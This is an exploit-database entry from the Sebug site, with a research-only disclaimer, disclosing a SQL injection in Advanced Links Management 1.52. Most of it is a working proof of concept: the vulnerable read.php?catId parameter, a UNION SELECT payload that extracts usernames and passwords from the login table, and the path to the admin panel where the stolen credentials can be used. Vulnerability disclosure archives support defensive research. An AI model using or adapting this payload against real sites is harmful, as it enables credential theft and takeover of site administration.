Advanced Links Management (ALM) 1.52 SQL Injection Vulnerability
SBEUGID:SEBUGE2008053531
发布时间:2008-05-10
[www.sebug.net]
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
###################################################
[~] ALM - Advanced Links Management remote SQL injection exploit
[~] Script download : http://www.easy-script.com/scripts-dl/alm_v152.zip                                                                                                            
[~] Founder: His0k4 { ALGERIAN HACKER }
[~] Greetz : All friends & muslims HaCkErS...
[~] Contact: His0k4.hlm[at]gmail.com
[~] P.O.C :
---------------------
http://localhost/[script_path]/read.php?catId={SQL}
[~] Exemple :
http://localhost/[script_path]/read.php?catId=-1 UNION SELECT 1,concat(username,0x3a,password) FROM login--
---------------------
[~] Note:
    Admin login:  http://localhost/[script_path]/admin
---------------------
###############################################
// Sebug.net [ 2008-05-11 ]

本信息由SEBUG翻译整理,版权所有,未经许可,不得转载

提交信息 | 本站声明 | 帮助 | 论坛 | 合作伙伴
Copyright © SEBUG Security Database 2006  All rights Reserved.
鄂ICP备05024839号